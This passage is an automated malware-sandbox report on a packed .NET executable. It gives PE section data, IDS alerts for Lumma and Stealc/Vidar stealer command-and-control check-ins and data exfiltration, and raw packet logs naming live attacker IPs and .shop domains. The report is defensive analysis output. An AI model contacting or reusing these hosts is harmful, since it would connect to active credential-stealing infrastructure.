IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63ab0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61c44	0x61e00	643a21659f97059e24d2fffc6a69e3e8	False	0.9937839240102171	data	7.995930954925833	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5c8	0x600	db1daa9db276719b7dce2f7fee59adb7	False	0.4361979166666667	data	4.115782972549961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	668ddc03321cdfb17f8be719cbc539e8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x643d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T01:49:13.280471+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49711	5.75.211.162	443	TCP
2024-09-27T01:49:14.428065+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49712	5.75.211.162	443	TCP
2024-09-27T01:49:15.786891+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49713	5.75.211.162	443	TCP
2024-09-27T01:49:17.144656+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49714	5.75.211.162	443	TCP
2024-09-27T01:49:17.837719+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.8	49714	TCP
2024-09-27T01:49:18.485568+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49715	5.75.211.162	443	TCP
2024-09-27T01:49:19.181021+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.8	49715	5.75.211.162	443	TCP
2024-09-27T01:49:19.181248+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.8	49715	TCP
2024-09-27T01:49:19.954689+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49716	5.75.211.162	443	TCP
2024-09-27T01:49:21.029579+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49717	5.75.211.162	443	TCP
2024-09-27T01:49:23.952433+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49718	5.75.211.162	443	TCP
2024-09-27T01:49:25.030299+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49719	5.75.211.162	443	TCP
2024-09-27T01:49:26.246700+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49720	5.75.211.162	443	TCP
2024-09-27T01:49:27.350167+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49721	5.75.211.162	443	TCP
2024-09-27T01:49:29.128110+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49722	5.75.211.162	443	TCP
2024-09-27T01:49:30.797488+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49723	5.75.211.162	443	TCP
2024-09-27T01:49:32.493876+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49724	5.75.211.162	443	TCP
2024-09-27T01:49:33.967528+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49725	5.75.211.162	443	TCP
2024-09-27T01:49:35.320314+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49726	5.75.211.162	443	TCP
2024-09-27T01:49:38.919895+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49727	5.75.211.162	443	TCP
2024-09-27T01:49:40.307093+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49728	5.75.211.162	443	TCP
2024-09-27T01:49:41.923117+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49729	5.75.211.162	443	TCP
2024-09-27T01:49:43.432581+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49730	5.75.211.162	443	TCP
2024-09-27T01:49:45.419609+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49731	5.75.211.162	443	TCP
2024-09-27T01:49:47.414295+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49733	5.75.211.162	443	TCP
2024-09-27T01:49:48.876875+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49734	147.45.44.104	80	TCP
2024-09-27T01:49:49.903557+0200	2056176	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)	1	192.168.2.8	63899	1.1.1.1	53	UDP
2024-09-27T01:49:50.206670+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49735	5.75.211.162	443	TCP
2024-09-27T01:49:50.505332+0200	2056177	ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)	1	192.168.2.8	49736	104.21.36.139	443	TCP
2024-09-27T01:49:51.165765+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49736	104.21.36.139	443	TCP
2024-09-27T01:49:51.165765+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49736	104.21.36.139	443	TCP
2024-09-27T01:49:51.172573+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.8	59567	1.1.1.1	53	UDP
2024-09-27T01:49:51.289711+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49734	147.45.44.104	80	TCP
2024-09-27T01:49:51.658945+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.8	49737	172.67.132.32	443	TCP
2024-09-27T01:49:52.082515+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49737	172.67.132.32	443	TCP
2024-09-27T01:49:52.082515+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49737	172.67.132.32	443	TCP
2024-09-27T01:49:52.089727+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.8	60496	1.1.1.1	53	UDP
2024-09-27T01:49:52.292205+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49738	5.75.211.162	443	TCP
2024-09-27T01:49:52.589108+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.8	49739	188.114.96.3	443	TCP
2024-09-27T01:49:53.067649+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49739	188.114.96.3	443	TCP
2024-09-27T01:49:53.067649+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49739	188.114.96.3	443	TCP
2024-09-27T01:49:53.080733+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.8	64811	1.1.1.1	53	UDP
2024-09-27T01:49:53.482571+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49734	147.45.44.104	80	TCP
2024-09-27T01:49:53.483133+0200	2827449	ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)	1	147.45.44.104	80	192.168.2.8	49734	TCP
2024-09-27T01:49:53.593903+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.8	49740	188.114.96.3	443	TCP
2024-09-27T01:49:54.049802+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49740	188.114.96.3	443	TCP
2024-09-27T01:49:54.049802+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49740	188.114.96.3	443	TCP
2024-09-27T01:49:54.056407+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.8	50316	1.1.1.1	53	UDP
2024-09-27T01:49:54.439787+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49741	5.75.211.162	443	TCP
2024-09-27T01:49:54.540911+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.8	49742	188.114.96.3	443	TCP
2024-09-27T01:49:55.118125+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49742	188.114.96.3	443	TCP
2024-09-27T01:49:55.118125+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49742	188.114.96.3	443	TCP
2024-09-27T01:49:55.121784+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.8	63771	1.1.1.1	53	UDP
2024-09-27T01:49:55.596548+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.8	49744	104.21.58.182	443	TCP
2024-09-27T01:49:56.165330+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49744	104.21.58.182	443	TCP
2024-09-27T01:49:56.165330+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49744	104.21.58.182	443	TCP
2024-09-27T01:49:56.165662+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49745	5.75.211.162	443	TCP
2024-09-27T01:49:56.244657+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.8	54463	1.1.1.1	53	UDP
2024-09-27T01:49:56.763724+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.8	49746	188.114.97.3	443	TCP
2024-09-27T01:49:57.208296+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49746	188.114.97.3	443	TCP
2024-09-27T01:49:57.208296+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49746	188.114.97.3	443	TCP
2024-09-27T01:49:57.210013+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.8	65460	1.1.1.1	53	UDP
2024-09-27T01:49:57.713031+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.8	49748	188.114.97.3	443	TCP
2024-09-27T01:49:57.777652+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.8	49747	45.132.206.251	80	TCP
2024-09-27T01:49:58.147555+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49748	188.114.97.3	443	TCP
2024-09-27T01:49:58.147555+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49748	188.114.97.3	443	TCP
2024-09-27T01:49:58.150216+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.8	61357	1.1.1.1	53	UDP
2024-09-27T01:49:58.665197+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.8	49749	104.21.77.130	443	TCP
2024-09-27T01:49:59.225507+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49749	104.21.77.130	443	TCP
2024-09-27T01:49:59.225507+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49749	104.21.77.130	443	TCP
2024-09-27T01:50:01.807899+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49752	104.21.2.13	443	TCP
2024-09-27T01:50:01.807899+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49752	104.21.2.13	443	TCP
2024-09-27T01:50:25.541071+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49756	5.75.211.162	443	TCP
2024-09-27T01:50:27.046941+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49757	5.75.211.162	443	TCP
2024-09-27T01:50:28.394320+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49758	5.75.211.162	443	TCP
2024-09-27T01:50:29.973772+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49759	5.75.211.162	443	TCP
2024-09-27T01:50:30.837912+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.8	49759	TCP
2024-09-27T01:50:31.504607+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49760	5.75.211.162	443	TCP
2024-09-27T01:50:32.445597+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.8	49760	TCP
2024-09-27T01:50:33.226900+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49761	5.75.211.162	443	TCP
2024-09-27T01:50:34.242406+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49762	5.75.211.162	443	TCP
2024-09-27T01:50:35.700224+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49763	104.26.12.205	80	TCP
2024-09-27T01:50:37.349196+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49766	5.75.211.162	443	TCP
2024-09-27T01:50:38.462415+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.8	49767	5.75.211.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 01:49:10.795499086 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:10.795542955 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:10.795684099 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:10.801845074 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:10.801868916 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:11.439776897 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:11.439843893 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:11.616480112 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:11.616549969 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:11.616915941 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:11.616981030 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:11.620693922 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:11.667409897 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.269335985 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.269422054 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.269438982 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.269465923 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.269484997 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.269495010 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.269514084 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.269556046 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.377087116 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.377132893 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.377187014 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.377214909 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.377232075 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.377259970 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.382251024 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.382327080 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.382343054 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.382394075 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.382407904 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.382438898 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.382738113 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:12.382755041 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:12.394162893 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:12.394243002 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:12.394344091 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:12.394653082 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:12.394681931 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.280318022 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.280471087 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.284591913 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.284615993 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.285105944 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.285175085 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.285523891 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.331404924 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.771955013 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.772098064 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.772135019 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.772175074 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.772223949 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.772255898 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.774364948 CEST	49711	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.774403095 CEST	443	49711	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.776473045 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.776532888 CEST	443	49712	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:13.776639938 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.776839972 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:13.776853085 CEST	443	49712	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:14.427867889 CEST	443	49712	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:14.428065062 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:14.428750038 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:14.428772926 CEST	443	49712	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:14.433897972 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:14.433912992 CEST	443	49712	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:15.114834070 CEST	443	49712	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:15.114928961 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.114939928 CEST	443	49712	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:15.115010977 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.115238905 CEST	49712	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.115262032 CEST	443	49712	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:15.116800070 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.116847038 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:15.116965055 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.117120981 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.117131948 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:15.786763906 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:15.786890984 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.787708998 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.787719965 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:15.789712906 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:15.789719105 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:16.487107038 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:16.487159967 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:16.487207890 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:16.487237930 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:16.487250090 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:16.487283945 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:16.487323999 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:16.487371922 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:16.487554073 CEST	49713	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:16.487571955 CEST	443	49713	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:16.489598989 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:16.489624977 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:16.489686012 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:16.489989996 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:16.490000010 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.144581079 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.144655943 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.145131111 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.145142078 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.147097111 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.147104979 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.837471008 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.837506056 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.837582111 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.837591887 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.837629080 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.837663889 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.838011980 CEST	49714	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.838030100 CEST	443	49714	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.839682102 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.839730024 CEST	443	49715	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:17.839818954 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.840022087 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:17.840033054 CEST	443	49715	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:18.485389948 CEST	443	49715	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:18.485568047 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:18.486435890 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:18.486505032 CEST	443	49715	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:18.488614082 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:18.488624096 CEST	443	49715	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.181071043 CEST	443	49715	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.181153059 CEST	443	49715	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.181190014 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.181231976 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.181375980 CEST	49715	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.181405067 CEST	443	49715	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.276880026 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.276931047 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.277054071 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.277354002 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.277367115 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.951443911 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.954689026 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.955240011 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.955259085 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.957953930 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.957967043 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:19.958055973 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:19.958072901 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:20.283689022 CEST	49717	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:20.283754110 CEST	443	49717	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:20.283859968 CEST	49717	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:20.284166098 CEST	49717	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:20.284184933 CEST	443	49717	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:20.668767929 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:20.668873072 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:20.668910980 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:20.669239998 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:20.686916113 CEST	49716	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:20.686943054 CEST	443	49716	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:21.029381037 CEST	443	49717	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:21.029578924 CEST	49717	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:21.029999018 CEST	49717	443	192.168.2.8	5.75.211.162
